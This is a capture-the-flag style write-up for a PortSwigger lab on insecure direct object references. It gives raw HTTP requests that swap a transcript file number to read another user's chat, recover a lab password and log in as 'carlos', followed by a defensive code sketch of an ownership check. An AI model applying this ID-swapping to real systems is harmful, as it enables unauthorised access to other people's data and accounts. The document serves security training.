PortSwigger: Insecure direct object references

Insecure direct object references

Solution

Start a chat with the bot

GET /chat HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /download-transcript HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------52388940231597668561058974223
Content-Length: 342
Origin: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/chat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

-----------------------------52388940231597668561058974223
Content-Disposition: form-data; name="transcript"

CONNECTED: -- Now chatting with Hal Pline --<br/>You: hacker here<br/>Hal Pline: What did your last slave machine die of?<br/>You: test 123<br/>Hal Pline: Who cares?
-----------------------------52388940231597668561058974223--

Edit the transcript download request

Change the request path from /download-transcript/2.txt to /download-transcript/1.txt and read the history of the last chat.
Found the password for user carlos: ugmh9g5jmwkzx7iyqtmv
---
GET /download-transcript/2.txt HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/chat
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /download-transcript/1.txt HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/chat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
---
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="1.txt"
X-Frame-Options: SAMEORIGIN
Content-Length: 520

CONNECTED: -- Now chatting with Hal Pline --
You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
Hal Pline: Takes one to know one
You: Ok so my password is ugmh9g5jmwkzx7iyqtmv. Is that right?
Hal Pline: Yes it is!
You: Ok thanks, bye!
Hal Pline: Do one!
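
The root cause of the response above is that the download endpoint looks up the transcript by file name only and never ties it to the requesting session. The sketch below is an added example, not the lab's server code: `TranscriptStore`, its methods and the session labels are hypothetical, and it contrasts the file-name-only lookup with an object-level ownership check.

```python
import secrets


class TranscriptStore:
    """Constructed stand-in for the lab's transcript storage (assumed design)."""

    def __init__(self):
        self._files = {}      # file name -> (owner session, transcript text)
        self._counter = 0

    def save_sequential(self, session, text):
        # Weak: predictable names 1.txt, 2.txt, ... as seen in the requests.
        self._counter += 1
        name = f"{self._counter}.txt"
        self._files[name] = (session, text)
        return name

    def save_random(self, session, text):
        # Defence in depth: unguessable name, still bound to its owner.
        name = secrets.token_urlsafe(16) + ".txt"
        self._files[name] = (session, text)
        return name

    def download_vulnerable(self, session, name):
        # Checks only that the file exists; the session is ignored.
        entry = self._files.get(name)
        return (200, entry[1]) if entry else (404, "")

    def download_hardened(self, session, name):
        # Object-level authorization: the caller must own the transcript.
        entry = self._files.get(name)
        if entry is None or entry[0] != session:
            return (404, "")   # same answer for "missing" and "not yours"
        return (200, entry[1])


def demo():
    store = TranscriptStore()
    # Constructed sample data: two sessions, two transcripts.
    first = store.save_sequential("session-A", "earlier user's chat")
    mine = store.save_sequential("session-B", "You: test 123")
    return {
        "names": (first, mine),
        "vuln_other": store.download_vulnerable("session-B", first)[0],
        "hard_other": store.download_hardened("session-B", first)[0],
        "hard_own": store.download_hardened("session-B", mine)[0],
    }


if __name__ == "__main__":
    print(demo())
```

Random file names alone only make the identifier harder to guess; the ownership check in `download_hardened` is what removes the IDOR.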

Log in to the panel as user carlos

L: carlos
P: ugmh9g5jmwkzx7iyqtmv
---
POST /login HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=Y69DiePK1Xf4nRvwYzxvwcvb1mli2QAk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=MrlUm5lkCUdINXWtpDVRToYzY9dY9rym&username=carlos&password=ugmh9g5jmwkzx7iyqtmv
---
GET /my-account?id=carlos HTTP/2
Host: 0a180096044a7a1681b6f810004200e6.web-security-academy.net
Cookie: session=50ByzSiSnfE2R0vMU6c3gmuAcLJhqsZz
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180096044a7a1681b6f810004200e6.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved